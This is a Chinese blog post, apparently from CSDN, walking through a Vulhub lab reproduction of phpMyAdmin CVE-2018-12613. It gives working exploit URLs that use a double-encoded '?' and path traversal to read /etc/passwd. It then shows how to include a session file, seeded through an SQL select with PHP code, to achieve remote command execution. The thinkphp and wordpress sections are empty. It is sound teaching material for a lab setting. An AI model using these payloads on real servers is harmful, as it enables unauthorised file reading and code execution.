Vulhub 漏洞复现系列(一):未授权访问与远程命令执行漏洞(phpmyadmin,thinkphp,wordpress)

已于 2025-05-07 21:54:20 修改
阅读量546 收藏 3
点赞数 21
文章标签: 安全 web安全 网络安全
于 2025-05-07 20:24:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75445650/article/details/147748198
版权

目录

一.phpmyadmin(CVE-2018-12613)

1.搭建环境

2.漏洞复现

3.攻击原理:

二.thinkphp

三.wordpress

一.phpmyadmin(CVE-2018-12613)

1.搭建环境

step1:进入到对应漏洞的目录之后,启动环境

sudo docker-compose up -d

ERROR:说明Docker 客户端尝试从 Docker Hub 拉取镜像(mysql:5.5)时超时了,原因通常是网络连接问题。

解决:

1)编辑/etc/docker/daemon.json,添加镜像加速地址

sudo mkdir -p /etc/docker    
vi /etc/docker/daemon.json
{
  "registry-mirrors": [
        "https://docker.sunzishaokao.com",
        "https://docker.1ms.run",
        "https://docker.1panel.live",
        "https://docker.anyhub.us.kg"
  ]
}

2)进行加载并重启docker

systemctl daemon-reload 
systemctl restart docker

3)尝试:解决

step2:访问http://your-ip:8080

使用ifconfig查询本机的ip地址(eth0),然后访问上述网站进入漏洞环境

2.漏洞复现

目标一:读取/etc/passwd

http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../etc/passwd

成功读取目标文件

目标二:get shell,拿到执行权限

step1:在SQL查询页面上执行以下命令

select '<?php echo `ls` ?>';

然后在inspect的storage里找到cookie值

step2:构造以下url,包含并执行session文件中的PHP代码

http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_fccf89f4e64ff48d5702459d62accc39

成功访问后,服务器返回了当前目录下的文件列表,在select'.....'里,成功实现了远程命令执行

3.攻击原理(

首先找到index.php源文件并观察

docker ps
docker exec -it cve-2018-12613_web_1 /bin/bash

解释:如果满足上述几个条件,target 参数指定的文件会被直接包含执行,条件有非空,是字符串,不能以index开头,不在黑名单中,通过白名单检查函数Core::checkPageValidity()

1)查看黑名单

黑名单有import.php和export.php

2)查看白名单校验函数,在libraries/classes/Core.php

解释:

$_page = urldecode($page);
$_page = mb_substr($_page, 0, mb_strpos($_page . '?', '?'));

将传入的page进行URL解码,然后从URL参数中提取文件名部分,即去掉?后面的查询字符串

漏洞利用:%253f,服务器自动解码一次为%3f,然后urldecode函数再解码一次为?,则满足截取?之前的内容在白名单中,从而返回true

index.php?target=db_sql.php%253f/../../../../etc/passwd

我们可以结合路径遍历漏洞访问服务器上的任意文件(如临时目录下的会话文件 sess_xxx),并通过文件包含功能将这些文件加载执行,最终导致任意代码执行或敏感信息泄露,从而实现远程命令执行(RCE)等攻击效果。

http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_fccf89f4e64ff48d5702459d62accc39

/tmp/sess_fccf89f4e64ff48d5702459d62accc39是服务器的会话文件,该文件包含有PHP攻击代码,即我们在SQL询问中写入的select '<?php echo `ls` ?>';,所以当访问该文件时会执行其中的PHP代码,进而达到目的

(2025.5.7 持续更新)

二.thinkphp

三.wordpress

[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613
qq_51577576的博客
10-06 864
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613 在4.8.2之前的phpMyAdmin 4.8.x中发现了个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。
[ vulhub漏洞复现篇 ] Phpmyadmin后台代码执行CVE-2016-5734
qq_51577576的博客
10-05 1123
[ vulhub漏洞复现篇 ] Phpmyadmin后台代码执行CVE-2016-5734 CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x 版本(直至 4.4.15.7),和 4.0.x 版本(直至 4.0.10.16)。 CVE的作者利用在p
web渗透学习目录-新手打开思路
weixin_42109829的博客
01-25 1726
,基础学习 01.基础学习 [[编码总结]] [[JSON三种数据解析方法]] [[js加密,解密]] [[Internet保留地址和非保留地址、内网和公网、VNC和UltraVN]] 代理 [[SOCKS4、SOCKS5和HTTP代理]] [[Windows - Netch 使用教程]] [[Netch设置端口ip进行转发流量]] [[全能终端神器——MobaXterm]] 通信协议 [[IIOP-百度百科]] 互联网内部对象请求代理协议 二、信息收集 02.信息收集 1.[
【小迪安全web安全|渗透测试|网络安全 | 学习笔记-7
youngerll的博客
01-02 6303
【小迪安全web安全|渗透测试|网络安全 | 学习笔记-7
phpMyAdmin漏洞利用安全防范
02-25
phpMyAdmin功能非常强大,可以执行命令,导入或者导出数据库,可以说通过phpMyAdmin可以完全操控Mysql数据库。但是,如果存在设置的Root密码过于简单,代码泄露Mysql配置等漏洞,通过些技术手段,99%都能获取网站...
PhpMyAdmin 远程代码执行漏洞 (CVE-2016-5734)复现
君莫hacker的博客
09-12 787
0x01 漏洞介绍 漏洞描述 phpMyAdmin套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第个参数中。 在PHP5.4.7以前,preg_replace的第个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造个任意代码执行漏洞漏洞编号 CVE-2016-5734 受影响版本 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本
端口安全讲解
rzy41880的博客
05-07 873
‌MAC地址绑定机制‌端口安全通过记录连接到交换机端口的设备MAC地址,仅允许已授权的MAC地址通信。未绑定的设备接入时,系统会根据预设策略阻断或告警。‌安全MAC类型‌‌静态绑定‌:管理员手动配置允许的MAC地址列表;‌动态绑定‌:交换机自动学习首个接入设备的MAC地址并锁定;‌Sticky MAC‌:动态绑定基础上支持断电后保留绑定关系。类型定义特点安全动态MAC地址仅开启端口安全转换的MAC地址。设备重启后表项会丢失,需要重新学习。
中级注册安全工程师的《安全生产专业实务》科目如何选择专业?
m0_60557936的博客
05-07 345
中级注册安全工程师的《安全生产专业实务》有 7 个专业方向,选择时可考虑以下几个方面:
7.2.安全防御
2301_79902294的博客
05-07 714
• 密码存储:BCryptArgon2算法实现(Spring Security) • 多因素认证(MFA):TOTP集成(Google Authenticator API) • 生物识别安全:活体检测本地存储(Android Biometric API)• 数据库加密:透明数据加密(TDE)、字段级加密(Jasypt) • 文件存储安全:权限控制(Linux ACL)、客户端加密(WebCrypto API) • 备份恢复策略:异地加密备份(AWS S3 + KMS)-- 身份证号 -->
实时操作系统:航空电子系统的安全基石还是创新枷锁?
望获实时Linux系统
05-08 1224
实时操作系统的发展历程,实际上是部在确定性、安全性、创新性之间寻求平衡的进化史。当我们站在 25000 米高空俯瞰这场技术革命,方面要为纳秒级的时间精度、六个九的可靠性、开源社区的创造力等成就喝彩;另方面也要保持清醒头脑,思考在 RTOS 赋能飞行器智能化的过程中,如何应对随之而来的安全挑战,以及在拥抱人工智能量子计算等前沿技术时,如何守住航空安全的生命线。这些问题的答案将决定 RTOS 技术演进的未来方向,也将书写人类征服蓝天的下段传奇。
数字化时代下,软件测试中的渗透测试是如何保障安全的?
aiyuntest的博客
05-04 499
数字化时代下,软件测试中的渗透测试是如何保障安全的?在如今数字化信息化的时代,软件测试中存在渗透测试,其位置十分重要,它借助模拟恶意攻击的方式,去发现软件系统所存在的漏洞以及安全问题,这是保障软件安全的关键环节,接下来我会对它的各个方面进行详细介绍。对于软件开发企业而言,渗透测试能够提升软件的安全性,还能够增强软件的可靠性。
【React】Hooks 解锁外部状态安全订阅 useSyncExternalStore 应用最佳实践
day day up
05-04 774
在 React 18 的并发渲染模式下,传统状态订阅方式(如 useEffect + useState)可能引发 UI 状态不致的撕裂问题。useSyncExternalStore 作为 React 团队推出的解决方案,通过同步读取状态快照订阅分离机制,为外部状态源(如 Redux、Zustand、浏览器 API)提供了并发安全的订阅能力。
宁德时代区块链+数字孪生专利解析:去中心化身份认证重构产业安全底座
beige888的博客
05-06 836
宁德时代此次专利布局,不仅彰显其从电池制造商向能源科技平台转型的战略决心,更预示着数字孪生技术正从“单点仿真”迈向“安全互联”的新阶段。随着区块链工业互联网的深度融合,个更透明、更可信的数字孪生世界正在加速到来。这项技术将区块链数字孪生深度耦合,直击工业互联网领域长期存在的身份认证痛点,为智能制造、能源物联网等场景提供全新安全范式。2025年5月6日,金融界披露宁德时代未来能源(上海)研究院母公司宁德时代新能源科技股份有限公司联合申请的项关键专利——宁德时代提出的解决方案通过。
2025年大风灾害预警升级!疾风气象大模型如何筑起安全防线?
专注AI大模型,软件混淆,授权
05-06 171
2025年,当我们回望那些大风“擦肩而过”的时刻,会庆幸科技已为我们筑起看不见的铜墙铁壁。:今年某沿海城市突发14级阵风,导致塔吊倒塌、广告牌坠落,直接经济损失超亿元——若提前精准预警,损失或可减少70%以上。近年来,全球极端天气事件频发,大风灾害正成为威胁城市安全、交通运输和公共设施的重要隐患。面对这趋势,传统的气象预警方式已难以满足精准防御的需求,而基于人工智能的。:北方部分地区大风日数或增加10%-15%,强对流天气引发的短时大风更频繁;:常规预报仅覆盖区域级,无法定位到街道、工地等高风险点;
【软件设计师:数据库】13.数据库控制安全
最新发布
RickyIT的专栏
05-08 182
SQL是结构化查询语言(`Structured Query Language`)的缩写,其功能包括数据查询、数据操纵、数据定义和数据控制四个部分。 - SQL 语言简洁、方便实用、功能齐全,已成为目前应用最广的关系数据库语言。 - SQL既是自含式语言(联机交互),又是嵌入式语言(宿主语言)
2025数字中国创新大赛-数字安全赛道数据安全产业积分争夺赛决赛Writeup
末初 - mochu7
05-07 821
2025数字中国创新大赛-数字安全赛道数据安全产业积分争夺赛决赛Writeup
NVIDIA Halos:智能汽车革命中的全栈式安全系统
全世界的博客
05-06 820
传统方案就像"打补丁",激光雷达厂商只管点云加密,芯片商专注硬件隔离,软件商又另搞套认证体系。某车企安全总监吐槽:“我们得同时对接17家供应商的安全协议,每次OTA升级都像在拆炸弹。当神经网络做出"突然左转"的决策时,工程师往往要花72小时回溯训练数据。更可怕的是,对抗样本攻击能让系统把"停止标志"识别为"限速80"——这种漏洞在传统车规级芯片上根本无法实时检测。训练数据的污染可能通过云端渗透到车载系统,而现有架构下,云端安全团队和车端团队就像两个说着不同语言的守卫,中间还隔着脆弱的通信管道。
BeeWorks IM:专业安全的企业私有化即时通讯软件
weixin_53855915的博客
05-08 164
实时更新、版本追踪、权限管理等功能,确保了文档的完整性和致性,同时也方便了团队成员之间的协作。协作日历功能则帮助企业更好地管理团队日程。高清流畅的视频画面、清晰稳定的音频传输,配合便捷的屏幕共享、文件传输等功能,使得远程沟通面对面交流无异。这种站式协同办公的模式,让企业办公更加便捷、高效,也为企业数字化转型奠定了坚实的基础。BeeWorks IM是款专为企业量身定制的私有化即时通讯工具,凭借其强大的内网部署能力、卓越的安全性能以及全面的协同办公功能,正成为众多企业迈向智慧办公的首选利器。
安全为上,在系统威胁建模中使用量化分析
The Open Group是一个全球性联合机构,旨在通过在900+个会员单位间培养协作。
05-05 1126
本文基于微软、Kendra等机构的实战经验,拆解威胁建模四阶方法论在量化视角下的重构路径,剖析混合整数规划在控制措施优化中的工程化应用,并为不同规模组织提供可落地的敏捷实践框架。微软威胁建模专家Simone Courty提出:"威胁建模是从安全视角分析系统设计的结构化过程,包含四个核心阶段:系统理解→威胁识别→缓解设计→验证闭环"。当前主要方法包括微STRIDE模型(欺骗、篡改、抵赖、信息泄露、拒绝服务、特权提升),但Simone强调:"没有单标准方法,不同模型各有优劣"。
vulhub漏洞复现
02-09
### 使用 Vulhub 进行漏洞复现 #### 下载并安装 Vulhub 为了开始使用 Vulhub,需先将其仓库克隆到本地环境中。这可以通过执行如下命令完成: ```bash git clone https://github.com/vulhub/vulhub.git ``` 该操作将会把整个 Vulhub 项目下载至当前目录下[^1]。 #### 启动特定漏洞环境 Vulhub 提供了多种不同类型的漏洞场景模拟,每种场景都对应着实际存在的软件缺陷或配置错误。对于想要启动某个具体的漏洞实例来说,通常只需要进入相应的文件夹,并利用 Docker Compose 工具来快速部署所需的容器化服务。例如,要设置 ActiveMQ 的测试环境,则应导航到 `vulhub/activemq/CVE-2016-3088` 文件夹内,接着运行下面这条指令: ```bash cd vulhub/activemq/CVE-2016-3088 docker-compose up -d ``` 上述命令会自动拉取必要的镜像资源并在后台启动所有关联的服务进程[^2]。 #### 开展漏洞检测分析 旦目标应用成功上线之后,就可以借助各种网络安全工具来进行进步的研究工作了。比如可以采用 Nmap 对网络中的主机和服务进行全面扫描;也可以直接打开 Web 浏览器查看应用程序界面,以此了解其基本功能特性以及可能存在的安全隐患。针对某些已知的安全问题,还可以配合 Burp Suite 等代理服务器截获 HTTP 请求流量,进而尝试构造恶意输入以验证是否存在可被攻击者利用的风险点[^4]。 #### 学习更多理论知识 除了动手实践之外,深入理解背后的技术细节同样重要。因此建议阅读官方文档或其他权威资料,掌握有关于选定案例的具体成因及其修复措施等方面的信息。这样不仅有助于加深记忆效果,而且能够培养解决复杂难题的能力[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你好我是小美

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值